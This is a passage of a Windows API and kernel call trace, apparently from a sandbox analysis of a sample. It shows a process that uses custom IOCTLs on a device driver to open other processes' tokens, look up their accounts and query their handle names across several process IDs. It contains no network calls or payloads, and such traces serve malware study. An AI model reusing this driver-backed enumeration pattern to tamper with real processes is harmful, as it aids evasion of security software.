lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.514] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002040640, HandleInformation=0x0) returned 0x0 [0226.514] ObOpenObjectByPointer (in: Object=0xfffffa8002040640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.514] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x14 [0226.514] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.514] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.514] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.514] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.514] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.516] CloseHandle (hObject=0xc4) returned 1 [0226.516] CloseHandle (hObject=0xc8) returned 1 [0226.516] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.516] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.516] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.516] PsAcquireProcessExitSynchronization () returned 0x0 [0226.516] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0) [0226.518] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800206ad00, HandleInformation=0x0) returned 0x0 [0226.518] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.518] PsReleaseProcessExitSynchronization () returned 0x2 [0226.518] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0226.518] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.518] ObfDereferenceObject (Object=0xfffffa800206ad00) returned 0x1 [0226.518] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.518] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.518] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.518] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0226.518] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.518] PsAcquireProcessExitSynchronization () returned 0x0 [0226.518] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0) [0226.518] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800206a260, HandleInformation=0x0) returned 0x0 [0226.518] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.518] PsReleaseProcessExitSynchronization () returned 0x2 [0226.519] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0226.519] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.519] ObfDereferenceObject (Object=0xfffffa800206a260) returned 0x1 [0226.519] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.519] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.519] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.519] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.519] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.519] PsAcquireProcessExitSynchronization () returned 0x0 [0226.519] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880052b35d0) [0226.519] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.519] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.519] PsReleaseProcessExitSynchronization () returned 0x2 [0226.519] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0226.519] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.519] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.519] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.520] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x824) returned 0xc8 [0226.520] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.520] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002088b30, HandleInformation=0x0) returned 0x0 [0226.520] ObOpenObjectByPointer (in: Object=0xfffffa8002088b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.520] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x14 [0226.520] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.520] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.520] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.520] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.520] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.522] CloseHandle (hObject=0xc4) returned 1 [0226.522] CloseHandle (hObject=0xc8) returned 1 [0226.522] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.522] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.522] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.522] PsAcquireProcessExitSynchronization () returned 0x0 [0226.522] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0) [0226.522] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002042af0, HandleInformation=0x0) returned 0x0 [0226.523] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.523] PsReleaseProcessExitSynchronization () returned 0x2 [0226.523] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0226.523] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.523] ObfDereferenceObject (Object=0xfffffa8002042af0) returned 0x1 [0226.523] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.523] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.523] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.523] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0226.523] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.523] PsAcquireProcessExitSynchronization () returned 0x0 [0226.523] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0) [0226.523] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800205acf0, HandleInformation=0x0) returned 0x0 [0226.523] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.523] PsReleaseProcessExitSynchronization () returned 0x2 [0226.523] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0226.523] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.523] ObfDereferenceObject (Object=0xfffffa800205acf0) returned 0x1 [0226.523] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.523] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.523] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.523] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.524] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.524] PsAcquireProcessExitSynchronization () returned 0x0 [0226.524] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880052b35d0) [0226.524] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.524] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.524] PsReleaseProcessExitSynchronization () returned 0x2 [0226.524] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0226.524] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.524] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.524] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.524] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0xc8 [0226.524] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.524] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002095470, HandleInformation=0x0) returned 0x0 [0226.524] ObOpenObjectByPointer (in: Object=0xfffffa8002095470, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.524] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x14 [0226.524] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.524] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.524] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.524] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.524] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.526] CloseHandle (hObject=0xc4) returned 1 [0226.526] CloseHandle (hObject=0xc8) returned 1 [0226.526] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.526] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.526] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.526] PsAcquireProcessExitSynchronization () returned 0x0 [0226.526] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0) [0226.526] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002091f20, HandleInformation=0x0) returned 0x0 [0226.526] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.526] PsReleaseProcessExitSynchronization () returned 0x2 [0226.527] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0226.527] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.527] ObfDereferenceObject (Object=0xfffffa8002091f20) returned 0x1 [0226.527] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.527] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.527] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.527] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0226.527] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.527] PsAcquireProcessExitSynchronization () returned 0x0 [0226.527] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0) [0226.527] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002091d30, HandleInformation=0x0) returned 0x0 [0226.527] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.527] PsReleaseProcessExitSynchronization () returned 0x2 [0226.527] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0226.527] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.527] ObfDereferenceObject (Object=0xfffffa8002091d30) returned 0x1 [0226.527] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.527] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.527] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.527] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.527] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.527] PsAcquireProcessExitSynchronization () returned 0x0 [0226.527] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880052b35d0) [0226.527] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.527] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.527] PsReleaseProcessExitSynchronization () returned 0x2 [0226.528] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0226.528] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.528] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.528] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.528] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x844) returned 0xc8 [0226.528] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.528] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020acb30, HandleInformation=0x0) returned 0x0 [0226.528] ObOpenObjectByPointer (in: Object=0xfffffa80020acb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.528] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x14 [0226.528] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.528] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.528] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.528] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.528] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.530] CloseHandle (hObject=0xc4) returned 1 [0226.530] CloseHandle (hObject=0xc8) returned 1 [0226.530] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.530] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.530] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.530] PsAcquireProcessExitSynchronization () returned 0x0 [0226.530] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0) [0226.530] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800205a390, HandleInformation=0x0) returned 0x0 [0226.530] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.530] PsReleaseProcessExitSynchronization () returned 0x2 [0226.530] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0226.530] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.530] ObfDereferenceObject (Object=0xfffffa800205a390) returned 0x1 [0226.530] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.530] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.530] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.530] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0226.530] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.531] PsAcquireProcessExitSynchronization () returned 0x0 [0226.531] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0) 